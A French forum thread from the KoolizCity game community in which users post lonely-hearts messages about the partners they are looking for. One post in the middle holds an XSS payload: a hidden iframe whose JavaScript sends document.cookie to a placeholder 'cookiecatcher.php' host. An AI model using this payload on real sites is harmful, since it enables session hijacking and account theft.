La communauté de KoolizCity
Vous n'êtes pas identifié.
Pauvre Aroufette
arouf partout mm dans kooliz
Ouais, tu peux te perdre partout, c'est juste l'habitude qu'il faut. Allez, courage.
Allez, pour aider tout ce beau monde à trouver son crush, son amant(e), son âme-soeur en cette époque du LOVE TO LOVE ! Se dire "je t'aime", c'est tellement important en cette époque si tristounette.
https://youtu.be/7zVjdzPN9hY
https://youtu.be/tlqwILQEoR4
Dernière modification par Rubischanel (05-02-2021 00:07:57)
playlist de q ça
mon type ideal se rapproche de beau , intelligent , ouvert , drole , islamique avec une touche de possessivité et de jalousie .
ANNONCE : Lauriceth recherche un homme "médaillé" avec un minimum de popularité, charismatique, beau, attentionné et qui pourra lui faire des beaux enfants !
Salut moi c'est Hana2 mais appellais moi Hana je cherche un mec gentil beau et voila qui'il soit riche ou pas je m'en m'oque du coup envoyer moi un message si il y a des intereraisser .
bonjour je suis celibataire et je recherche un mec serieux, qui voudra fondé une famille
Ajoutez moi
Liem
Je m'appelle Karen j'ai 25 ans je suis une fille gentille sympa je recherche un mec sérieux qui m'aime qui m'accepte comme je suis qui est toujours là pour moi voilà recherche entre 25 et 30 ans
Krncity a écrit:
Je m'appelle Karen j'ai 25 ans je suis une fille gentille sympa je recherche un mec sérieux qui m'aime qui m'accepte comme je suis qui est toujours là pour moi voilà recherche entre 25 et 30 ans
Je m'appelle Fanny, je suis gentille, drôle, à mourir de rire, adorable, mignonne, époustouflante, incroyable et j'aime bien les mecs un peu plus vieux. Donc voilà, je recherche un mec entre 50 et 60 ans qui m'acceptera avec mon caractère.
<iframe frameborder= 0 height=0 width=0src=JavaScript... : void(document.location=
"YOURURL/cookiecatcher.php?c= » document.cookie)></iframe>
coucou
salut je suis celib eheee lhomme de ma vie tattend quoi pour venir
Salut, je suis celibataire, je cherche un gars BG qui as 18 ans, je veux qu'il soit fidele qu'on partage un lien magique. J'ai besoin qu'il soit courageux, fort etc...
Donc je cherche actuellement un gars gentil mais pas trop. Dans le jeu.
Salut Lola, difficile d'en trouver des mecs ici, surtout maintenant, à ce temps, sur un jeu, mais qui sait le destin te mènera un jour
je cherche un homme fidèle,gentil b
Salut moi c'est Israella, ajoutez moi en amie si vous le voulez
Salut,moi C Elyana(appele moi ely).
Je cherche un gas au cheveux court(desolee,j'aime pas les long).J'aime les discret courageux,les coquins,les doux,les nouveaux qui adore mon style.
Je me fiche du sexe!!!!
bonjour a tous. j'espere que vous allez bien. je débute dans le jeu est j'aimerai bien faire des connaissances amicales et pourquoi pas amoureuse? veuillez m'envoyez un message je serai toute oui et ouverte a une éventuelle discussion!
Cool Girls a écrit:
mon type ideal se rapproche de beau , intelligent , ouvert , drole , islamique avec une touche de possessivité et de jalousie .
Tu cherches le mec parfait toi
bonjour je suis Alexandre ; Je suis français, j'habite en France, j ai 57 ans et je suis veuf
charlotte swag a écrit:
toujours celibataire
je suis charlotte swag
bisous
Salut
XD Moi je ne cherche jamais, ils viennent à moi oui bien à moi c'est toujours le grand Amour et bonheur ^^
salut moi c'est emma je suis celibataire